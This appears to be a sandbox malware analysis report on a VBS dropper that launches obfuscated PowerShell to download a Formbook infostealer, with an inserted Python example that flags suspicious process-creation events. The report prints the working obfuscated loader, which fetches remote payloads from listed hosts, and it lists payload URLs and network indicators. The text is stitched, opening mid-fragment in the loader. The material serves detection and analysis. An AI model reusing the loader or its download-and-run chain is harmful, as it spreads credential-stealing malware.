Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdel
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T15:32:15.637893+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49988 | 199.103.62.205 | 443 | TCP
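The Sigma matches above, together with the signatures "Wscript starts Powershell (via cmd or directly)", "Very long command line found" and "Uses ping.exe to check the status of other devices and networks", all reduce to checks on process-creation records of the kind shown in the Data: fields. The Python below is an added example, not from the report or from the Sigma project, that implements three such checks and runs them over constructed events modelled on this process tree. The rule names, the 1000-character threshold and the explorer.exe parent of wscript.exe are this example's own assumptions; the report gives only ParentProcessId 1028 for wscript.exe.

```python
"""Added example (not from the Joe Sandbox report or the Sigma project): the
process-creation checks behind the script-host and ping findings above, run
over constructed events shaped like the report's process tree.

Rule names, the 1000-character threshold and the explorer.exe parent of
wscript.exe are this example's own assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
CMDLINE_LIMIT = 1000  # assumed; the report's powershell.exe command line is several KB

# One DNS label per RFC 1123: letters, digits and interior hyphens only.  The
# underscore in "gormezl_6777" guarantees the lookup fails; the script most
# likely wants the delay of the failed lookup, not a reachability check.
HOST_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


@dataclass
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_valid_hostname(name: str) -> bool:
    return bool(name) and all(HOST_LABEL.match(label) for label in name.split("."))


def ping_target(command_line: str) -> Optional[str]:
    """Last non-option argument of a ping command line, if any."""
    args = [a for a in command_line.split()[1:] if not a.startswith("-")]
    return args[-1] if args else None


def evaluate(ev: ProcessEvent) -> List[str]:
    hits = []
    image, parent = basename(ev.image), basename(ev.parent_image)
    if parent in SCRIPT_HOSTS and image in SHELLS:
        hits.append("script_host_spawns_shell")
    if image in {"powershell.exe", "pwsh.exe"} and len(ev.command_line) > CMDLINE_LIMIT:
        hits.append("oversized_powershell_cmdline")
    if image == "ping.exe":
        target = ping_target(ev.command_line)
        if target is not None and not is_valid_hostname(target):
            hits.append("ping_unresolvable_host")
    return hits


def scan(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map PID -> rule hits for every event that triggers at least one rule."""
    return {ev.pid: hits for ev in events if (hits := evaluate(ev))}


# Constructed events modelled on this report's process tree.  The powershell
# command line is a shortened stand-in built from one literal repeated, so
# only its length matters here.
PS_CMDLINE = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "'
              + "$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';" * 40
              + '"')
SAMPLE_EVENTS = [
    ProcessEvent(3872, r"C:\Windows\System32\wscript.exe",
                 r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs"',
                 r"C:\Windows\explorer.exe"),                       # parent assumed
    ProcessEvent(3688, r"C:\Windows\System32\PING.EXE",
                 "ping gormezl_6777.6777.6777.677e",
                 r"C:\Windows\System32\wscript.exe"),
    ProcessEvent(7156, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 PS_CMDLINE, r"C:\Windows\System32\wscript.exe"),
    ProcessEvent(4242, r"C:\Windows\System32\PING.EXE",               # benign control
                 "ping -n 1 www.example.com", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

With these events only the ping child (3688) and the powershell child (7156) of wscript.exe fire; the wscript.exe launch itself and the control ping do not, which is the behaviour a parent/child rule should have so that ordinary logon scripts do not page anyone.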

          AV Detection

Source: 6 654398.vbs | ReversingLabs: Detection: 18%
Source: Yara match | File source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown | HTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.5:49988 version: TLS 1.2
          Source: Binary string: ystem.Core.pdb7y~X source: powershell.exe, 00000006.00000002.2657649363.000000000769A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5A source: powershell.exe, 00000006.00000002.2657649363.00000000075E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GJFjqeGumqI.exe, 0000000B.00000002.3467099503.0000000000C0E000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: cmdkey.pdbGCTL source: msiexec.exe, 0000000A.00000003.3126312023.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126442250.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000002.3467221616.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.3061903558.0000000021F0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059333142.0000000021D5C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.000000000376E000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3168090406.000000000326A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3170420691.000000000341E000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.00000000035D0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000A.00000003.3061903558.0000000021F0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059333142.0000000021D5C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.000000000376E000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3168090406.000000000326A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3170420691.000000000341E000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.00000000035D0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2665678628.0000000008710000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmdkey.pdb source: msiexec.exe, 0000000A.00000003.3126312023.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126442250.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000002.3467221616.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
Source: Joe Sandbox View | IP Address: 199.103.62.205 199.103.62.205
Source: Joe Sandbox View | IP Address: 199.59.243.227 199.59.243.227
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49988 -> 199.103.62.205:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /Koalitioner.prx HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: www.groupriam.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /zkwqTJp58.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: www.groupriam.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /enra/?mxv=bBN4&XFtPf6=EuJScojaXV9tkcwLe9A6ZNdie4KkCxAOd2jPPlI8uN15nuMsourZ6RcE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzR3lGN8BbnO4B13xmkasr+DtvmANIh/JvA8i/3xstHKmsaw== HTTP/1.1 | Host: www.foundation-repair.biz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Source: global traffic | DNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
Source: global traffic | DNS traffic detected: DNS query: www.groupriam.com
Source: global traffic | DNS traffic detected: DNS query: www.foundation-repair.biz
Source: powershell.exe, 00000006.00000002.2657649363.00000000075B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microR
Source: wscript.exe, 00000000.00000003.2196983936.000001B0BCAF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2198619389.000001B0BCAFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: wscript.exe, 00000000.00000003.2196983936.000001B0BCAF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2198619389.000001B0BCAFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enlV
Source: powershell.exe, 00000004.00000002.2329009817.0000019E28C6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://groupriam.com
Source: powershell.exe, 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2329009817.0000019E26EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.2329009817.0000019E28C6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.groupriam.com
Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000004.00000002.2329009817.0000019E26EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2624423621.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bruta.pl/Koalitioner.prx
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: cmdkey.exe, 0000000C.00000002.3466952802.00000000031A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: cmdkey.exe, 0000000C.00000002.3466952802.000000000317F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: cmdkey.exe, 0000000C.00000002.3466952802.000000000317F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: cmdkey.exe, 0000000C.00000003.3349544046.0000000007F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: powershell.exe, 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://promenter.rs/Koalitioner.prx
          Source: cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: cmdkey.exe, 0000000C.00000002.3468867917.0000000003FE4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3470326587.00000000064E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/$_Q
          Source: powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/Koalitioner.prx
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/L_y
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3171643157.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126476457.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3167761730.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.bin
          Source: msiexec.exe, 0000000A.00000003.3126476457.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3167761730.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.bin3
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.binT
          Source: msiexec.exe, 0000000A.00000002.3171643157.00000000067E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.binUnwesJaebruta.pl/zkwqTJp58.binKrlgsBrdpromenter.rs/zkwqTJp58.
          Source: msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/zkwqTJp58.binZ
          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
          Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.2.5:49988 version: TLS 1.2

          E-Banking Fraud

          Source: Yara match | File source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: amsi32_6656.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
          Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo 